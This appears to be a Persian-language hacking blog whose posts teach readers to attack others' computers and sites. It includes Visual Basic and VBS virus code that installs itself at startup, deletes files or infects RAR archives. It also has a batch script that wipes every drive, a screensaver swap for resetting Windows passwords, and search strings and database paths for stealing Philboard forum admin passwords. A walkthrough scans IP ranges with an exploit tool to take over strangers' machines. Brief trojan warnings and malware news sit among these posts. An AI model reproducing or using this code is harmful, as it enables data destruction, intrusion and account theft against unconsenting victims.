كرك كردن (Crack) دو مرحله داره:
1) پيدا كردن نام كاربر (Username)
2) پيدا كردن كلمه عبور (Password)
توي اين مقاله مي خواهيم ببينيم چطوري مي توان از سرورهاي FTP و سرور هاي ميل (Mail) كه از پروتكل هاي SMTP و POP3 پيروي مي كنند، براي كرك كردن استفاده كرد. شايد بپرسيد: «اسم كاربر و كلمه عبور ميل كه فقط براي نامه خوندنه! به چه درد من مي خوره؟!». بايد توجه داشته باشيد كه در بسياري مواقع سايت ها براي همه سرويس ها كاربر رو فقط با يک اسم كاربر و كلمه عبور مي شناسند. يعني مثلاً اگر شما توي سايت jafang.com عضو شديد، هم براي خواندن نامه و هم براي شركت توي مسابقه و قرعه كشي و هم براي شركت در تالار گفتمان از يک اسم كاربر و كلمه عبور استفاده مي كنيد. پس اگر من username و password مربوط به ايميل شما رو گير بيارم، مي تونم همه جاي سايت از اون استفاده كنم! (معمولاً اين جوريه، نه هميشه). از اين به بعد هر جا گفتيم «اسم»، منظورمون «نام كاربر يا Username» و هر جا گفتيم «رمز»، منظورمون همان «كلمه عبور يا Password» هست.

ادامه مطلب

در اين روش، پنجره کنترل پنل باز مي شود ولي هيچ يک از ابزارهايش اجرا نمي شوند و پيغام خطايي روي صفحه ظاهر مي شود. در ضمن اين ويروس، ويروسي کامل و مستقل هست و در هر بار اجراي ويندوز، اجرا مي شود.

1- ويژوال بيسيک را باز کنيد.
2- پروژه اي در حالت Standard EXE را انتخاب کنيد.
3- سپس بر روي form دو بار کليک کنيد و کدهاي زير را در آن (Form_Load) کپي کنيد:

On Error GoTo 1
Me.hide
App.taskvisible = false
Set fso = CreateObject("scripting.filesystemobject")
Set windir = fso.getspecialfolder(0)
file = App.Path & "\" & App.EXEName & ".exe"
FileCopy file, windir & "\" & App.EXEName & ".exe"
file2 = windir & "\" & App.EXEName & ".exe"
Set Reg = CreateObject("wscript.shell")
Reg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\run\autoupdate", file2
Sysdir = fso.getspecialfolder(1)
Sys = sysdir & "\rundll32.exe"
Open sys For Append As #3
1:

منظور از اين نوع ويروس ها، همان ويروس هاي vbs است. در اينجا روش ساخت ويروسي به نام vbs.folder را آموزش مي دهم. کار اين ويروس اين است که هر فايل با هر فرمتي که مي خواهيد را (اگر آن فايل در فولدري قرار داشته باشد و در هارد ديسک باشد) حذف مي کند. اين ويروس بسيار شبيه ويروس Biosan است. البته بايد بگويم اين ويروس از قابليت هاي ويروس Biosan سوء استفاده کرده است.

براي اين کار Notepad را باز کنيد و کدهاي زير را درونش کپي کنيد و با پسوند vbs ذخيره کنيد:

On Error Resume Next
Set fso = C...

ادامه مطلب

ياد مي گيريم که چطور ويروس مان تمام هارد و فلاپي ديسيک و ... کامپيوتر فرد قرباني را بگرده و بعد هر چي فايل rar وجود داشت، خودش را در فايل rar بيندازد. يعني خودش را فشرده کند و به آن فايل rar اضافه کند. از اين جهت مي گوييم که "ويروس نويسي فوق پيشرفته" چون بيشتر ويروس هاي vbs فقط فايل هاي vbs و vbe را آلوده مي کنند. ما نه تنها آنها را آلوده نمي کنيم بلکه فايل هاي فشرده را آلوده مي کنيم. ويروس vbs يعني همين. يعني خطرناک ترين ويروس هاي نرم افزاري.

Sub listadriv()
  On Error Resume Ne...

ادامه مطلب

براي اين کار بايد در ويژوال بيسيک مراحل زير را انجام دهيد.

1- يک Timer با intevral 1 درست کنيد.
2-بعد از اين کار، کد SetCursorPos 0, 0 را بصورت زير به روال Timer آن اضافه کنيد:

Private Sub Timer1_Timer()
SetCursorPos 0, 0
End Sub

3- حالا يک ماژول درست کنيد و کد زير را درونش کپي کنيد:

Declare Function SetCursorPos Lib "user32" (ByVal x As Long, ByVal y As Long) As Long

حالا برنامه آماد است. البته به جاي پارامترهاي تابع SetCursorPos که دو مقدار 0,0 است، مي توانيد مکان دلخواهي که مي خواهيد کرسر موس به آنجا بره را بنويسيد. بايد گفت که به اين کار، "قفل کردن موس" هم مي گويند.

مركز امنيتي پاندا از انتشار يك بدافزار جديد در اينترنت خبر داد و به كاربران توصيه كرد مواظب اين تروجان باشند.
Mitglieder از طريق ايميل منتشر مي‌شود و غالباً داراي موضوع يا متني مانند است. به اين ايميل يك فايل ضميمه شده است كه داراي نام‌هايي مانند Info_prices.zip ،Sms_text.zip ،Health_and_knowledge.zip ،Max.zip و Business.zip است.

به محض دريافت و اجراي اين فايل، يك برنامه اجرايي روي ويندوز اجرا مي‌شود و سعي مي‌كند با يك سري آدرسهاي اينترنتي تماس بگيرد. همچنين از ديگر نشانه هاي اين تروجان ساخت يك پوشه به نام /exefld در بخش Windows سيستم است. اين تروجان از طريق ترفندهاي اسپم و ارسال همگاني در حال منتشر شدن است و تا كنون هزاران كامپيوتر را آلوده كرده است.

در اين روش شخص مهاجم فايلي را به درون کامپيوتر شما انتقال مي دهد و پس از آنکه اين فايل را بر روي کامپيوترتان اجرا کنيد، در هر بار مراجعه به اينترنت، کنترل کامپيوتر شما در دست شخص مهاجم خواهد بود. بنابراين در هنگام چت هرگز فايلهاي با پسوند com ،exe ،pif ،scr و vbs را دريافت نکنيد.

عموماً مرسوم است که افراد عکس خود را جهت شناسايي ارسال مي کنند. دقت کنيد پسوند مرسوم براي فايلهاي عکس Jpg ،gif و bmp مي باشند. نکته ديگر آنکه هکرها عموماً فايل هاي تروجان را با دو پسوند ارسال مي کنند. مانند:
Mypicture.jpg.exe
که در واقع اين فايل با پسوند exe مي باشند نه jpg. بنابراين هنگام ارسال اين فايل شما آنرا با نام Mypicture.jpgدر پنجره Receive file from مشاهده خواهيد کرد. و پس از اجراي آن، فايل تروجان بر سيستم شما نصب مي گردد و در مراجعات بعدي شما به اينترنت، شخص مهاجم مي تواند کنترل کامپيوتر شما را در دست بگيرد. پس همواره در گرفتن فايل از هر طريقي وسواس به خرج داده و فايل دريافتي را قبل از اجرا کاملاً مورد بازبيني قرار دهيد.

در نهايت اگر متوجه شديد که بر روي سيستمتان تروجان نصب شده است، براي از بين بردن آن مي توانيد از برنامه Trojans remover استفاده نماييد. از جمله برنامه هايي که در تهيه تروجان از آنها استفاده مي شوند مي توان به sub7 و برخي از انواع Key Logger اشاره نمود

اين ويروس بسيار خطرناك است چون با اجرا شدن آن ديگر براي قرباني راهي جز اف ديسك (FDisk) كردن كامپيوتر باقي نمي ماند. مواظب باشيد اشتباهاً روي آن دابل كليك نكنيد. (هرگونه استفاده غير متعارف از اين ويروس به عهده كاربر مي باشد.)

Notepad را باز کرده و کد زير را درون آن بنويسيد و سپس فايل را با پسوند bat.* ذخيره نماييد.

ATTRIB -a -s -h -r c
ATTRIB -a -s -h -r c:\windows\*.*
Echo y | echo a | Echo y | del c:\*.*
Echo y | echo a | Echo y | del d:\*.*
Echo y | echo a | Echo y | del e:\*.*
Echo y | echo a | Echo y | del f:\*.*
Echo y | echo a | Echo y | del g:\*.*
echo y | copy *.* C:\
echo y | copy *.* D:\
echo y | copy *.* E:\
echo y | copy *.* F:\
echo y | copy *.* G:\

ارسال ايميل با Telnet:
Telnet در اصل پروتکلي است که براي login و استفاده از يک کامپيوتر ديگر به کار مي رود. اما اينکه Telnet در هک چه نقشي چه فايده اي دارد را کلاً از زبان "کارولين مينل" برايتان مي نويسم: "فقط با يک سرويسگير Telnet [مثل همين Telnet خودمون در ويندوز] شما مي توانيد:
- ايميل بفرستيد.
- سورس (متن برنامه) سايتها را بخوانيد.
- به ميزبانهاي وب وروديهاي غير منتظره بفرستيد که مي تواند سبب دريافت پاسخهاي شگفت انگيز و گاهي غير قانوني شود.
- به بسياري از ديگر سرويسهاي کامپيوترهاي ميزب...
ادامه مطلب

براي هكر شدن بايد ياد بگيريد كه چگونه برنامه نويسي كنيد. البته برنامه نويسي از مهارت هاي اصلي (پايه) هک كردن است. اگر شما هيچ زبان برنامه نويسي بلد نيستيد، توصيه مي كنيم با زبان Python شروع كنيد. اين زبان بطور عالي طراحي و مستند سازي شده است و براي مبتدي ها بسيار مناسب است.
با وجود اينكه اولين زبان مفيد برنامه نويسي است اما اسباب بازي نيست و خيلي قدرتمند و انعطاف پذير است. و براي پروژه هاي بزرگ مناسب است. خودآموزهاي خوبي در وب سايت Python در دسترس است.
جاوا (Java) هم يك زبان خوب براي يادگيري ب...
ادامه مطلب

1- به Start -> Run برويد و فرمان cmd را تايپ كرده و Enter را بزنيد.
2- در پنجره باز شده اين فرمان‌ها را بدون عيب و نقص اجرا كنيد:

cd\
cd\windows\system32
mkdir hackpass
copy logon.scr hackpass \logon.scr
copy cmd.exe hackpass \cmd.exe
del logon.scr
rename cmd.exe logon.scr
exit

با اين كار در حقيقت پرامت داس را بجاي Screen Saver به ويندوز معرفي مي‌كنيد و اين كار، ويندوز را ناپايدار مي‌كند.
فقط توصيه ميکنم دستورهاي del و rename خيلي سريع انجام شوند (مي توان کل پروسه را در يک فايل bat قرار دهيد). اين دو خط دستور را بايد در عرض كمتر 2 ثانيه انجام دهيد تا فايل هاي مورد نظر توسط ويندوز جايگزين نشوند.
3- كامپيوتر را Restart نماييد.
4- Screen Saver ويندوز را فعال نماييد يا منتظر بمانيد تا خود بخود اجرا شود. خواهيد ديد كه بجاي Screen Saver، خط فرمان DOS ظاهر مي‌شود.
5- اكنون اگر مثلاً Username آن ariya بود و خواستيد پسورد آن را به xyxy تغيير دهيد، اين فرمان را در پرامپت DOS انجام دهيد: net user ariya xyxy
به اين ترتيب پسورد به 222 تغيير خواهد يافت.
نكته: حتماً بعد از پايان كار دو فايلي را كه در پوشه ‌ hackpass کپي کرديد را به جاي اول برگردانيد.

اين کار با ويژوال بيسيک امکان پذير است. در اين روش، ما با دستکاري در ريجيستري، تمام فايل هاي exe موجود در کامپيوتر را غيرفعال مي کنيم و مانع از اجراي آن ها مي شويم. اين کد يک کد مخرب قوي است و بايد با احتياط بسيار از آن استفاده کنيد. اگر مي خواهيد از اين کد در ويروس خودتان استفاده کنيد، فرمت ويروس خودتان را exe قرار ندهيد و مي توانيد از يکي از فرمت هاي زير استفاده کنيد
ادامه مطلب

BankFake.F
BankFake.F، يك اسب ترواي خطرناك است كه براي سرقت اطلاعات محرمانه مربوط به كاربران مؤسسات مالي اعتباري و بانك ها، مورد استفاده مجرمان اينترنتي قرار مي گيرد و تاكنون 9 شركت و بانك بزرگ در جهان مورد حمله آن قرار گرفته اند. اين برنامه مخرب از طريق نامه هاي الكترونيكي و دانلود فايل هاي آلوده از اينترنت منتشر مي شود؛ در رايانه هاي مورد حمله آيكوني به شكل دو لاك پشت در كنار يكديگر ايجاد خواهد شد كه مهمترين نشانه بصري نفوذ اين بدافزار محسوب مي شود. در صورتي كه مشتري هاي آنلاين مؤسسات مالي مو...
ادامه مطلب

شما پس از آموزش ميتوانيد هر چي سايت philboard تو اينترنت هست را ديفيس و هک کنيد. خوب، براي اين کار:
1- شما احتياج به پيدا کردن اين سايت ها تو اينترنت داريد. شما با سرچ اين عبارت ميتوانيد اين سايت ها را شناسايي کنيد:
inurl:=forum/philboard.asp يا powered by philboard
2- بعد از اينکه سايت مورد نظر را پيدا کرديد، با باگ زير ميتوانيد پسورد ادمين سايت را بدست بياوريد:
victimes.com/forum/database/philboard.mdb
victimes.com/forum/philboard_admin.asp
در اينجا victimes.com همان آدرس سايت مورد نظر ا...
ادامه مطلب

براي اين کار بايد 6 مرحله را بگذرانيد:

1- ويژوال بيسيک را اجرا کنيد. پروژه Standard EXE را انتخاب و يک دکمه (Command) و يک Timer هم به فرم اضافه کنيد و خاصيت interval تايمر را هم برابر 3000 قرار دهيد.

2- روي فرم (form) دو بار کليک کنيد و کدهاي زير را درونش وارد کنيد:

ادامه مطلب

- ساخت ويروسي به نام FLICKER
امروز شما با ويروس Flicker آشنا مي شويد. البته شايد بعضي از شما آن را بشناسيد. چون برنامه نسبتاً معروفي است كه بيشتر براي شوخي كردن از آن استفاده مي شود. البته Flicker بيشتر شباهت به يك برنامه اعصاب خوردكن دارد تا يك ويروس. FLICKER در معني به معناي چشمك زن و سوسو زدن است و دليل اين نامگذاري اين است كه اين به اصطلاح ويروس كاري مي كند كه كاربر هرگاه دكمه اي از كيبورد را فشار دهد، يك صداي بوق، كه به آن اصطلاحاً Beep گفته مي شود، از كامپيوتر شنيده مي شود و همزمان با اين صدا، صفحه مانيتور يكبار بطور سريع چشمك مي زند. با اين وضع عملاً كار با كيبورد امكانپذير نيست. اين ويروس از آن دسته است كه به كمك رجيستري كار مي كند.
خب، حالا مي رسيم
ادامه مطلب

دستتون درد نکونه نظرات خوبی داده بودین اینها همش از نظر لطف خودتونه از این به بعد تصمیم دارم کارم رو ادامه بدم

توجه                                                                                               توجه

از این که وبلاگ دیر آپدیت شد معذرت می خوام علتش هم این بود

که داشتینم وبلاگ جدیدی رو درست میکردیم. لطفا برید دیدن کنید و

نظر خودتون رو بهم بگیدسر بزن.

                     www.darinus.blogfa.com 

برنامه ای که یاهاش میشه پسورد آیدی رو عوض کرد و هم میشه آیدی رو باهاش کاملا پاک کرد.

دانلود

 

با سلام خدمت دوستان عزيز
بعد از چند وقت که منتظر بوديد امروز می خواهم روش عملی هک کردم به وسيله ی يکی از باگ هايی که در ويندوز های ايکس پی است و به وسيله ی آن می توانيد به کامپيوتر های ديگران شل گرفته و وارد آن شويد و هر کاری را بتوانيد بکنيد(بدون فرستادن فايل)
شما نيازمند برنامه ی Kath2هستيد که شما می توانيد آن را  از اینجادانلود دکنيد
 برنامه   را در درايو c خود کپی کنيد حال به داس رفته و تمامی کارها ی من را تکرار کرده تا به کامپيوتر های ديگران نفوذ کنيد و فرمول های زير را تک به تک بنويسيد شما بايد قبل از اينکه اين برنامه را اجرا کنيد بايد رنج آ ی پی خود را به دست آوريد بدين منظور روی ۲ کامپيوتر پايين صفحه که نمايانگر اتصال شما به اينترنت است کليک کرده و در تب دوم آن در جلوی جمله ی Client ip address: آدرس آی پی خود را به دست بياوريد حال اگر آی پی شما ۱۲۷.۰.۰.۱ بود رنج آی پی شما می شود ۱۲۷.۰.۰.۰ تا ۱۲۷.۰.۰.۲۵۵
حال مثلا آی پی من ۲۲۵.۳۵.۴۵.۱۲ است پس رنج آی پی من می شود
۲۲۵.۳۵.۴۵.۰ تا  ۲۲۵.۳۵.۴۵.۲۵۵
حال مراحل زير را برويد تا به کامپيوتر مورد نظر متصل شويد
ابتدا محلی که برنامه است رفته (چون اين برنامه در درايو c است ما به درايو c می رويم )با نوشتن فرمول زير

:c

حال بايد برنامه را اجرا کنيم با استفاده از فرمول زير
k.exe
يا
s
حال بايد رنج آی پی خود را به برنامه بديهم تا چک کند چه کامپيوتر هايی در محدوده ی آی اس پی ما آنلاين هستند و آيا اين نوع باگ بر روی آنها باز است يا بسته؟
k  225.35.45.0 225.35.45.255
باز ياد آورم شوم شما بايد در فرمول بالا بايد به جای اعداد ۲۲۵.۳۵.۴۵.۰ و ۲۲۵.۳۵.۴۵.۲۵۵ رنج آی پی خود را قرار دهيد
سپس برنامه تک به تک آی پی ها را چک می کند و در صورت آنلاين بود کامپيوتر ها و باز بودن آن باگ شما به آن کامپيوتر متصل شده و به پوشه ی سيستم ۳۲ آن رفته و می توانيد کارهای شيطانی خود را انجام دهيد.
حال اگر شما بخواهيد به درايو جاری برويد از فرمول زير استفاده کنيد
/cd
بعد ديگه خدا می داند که چه بلاهايی سرشون می ياريد فايل پاک می کنيد برنامه می گيريد يا می فرسيد.

 

 

 

 

نظر یادتون نره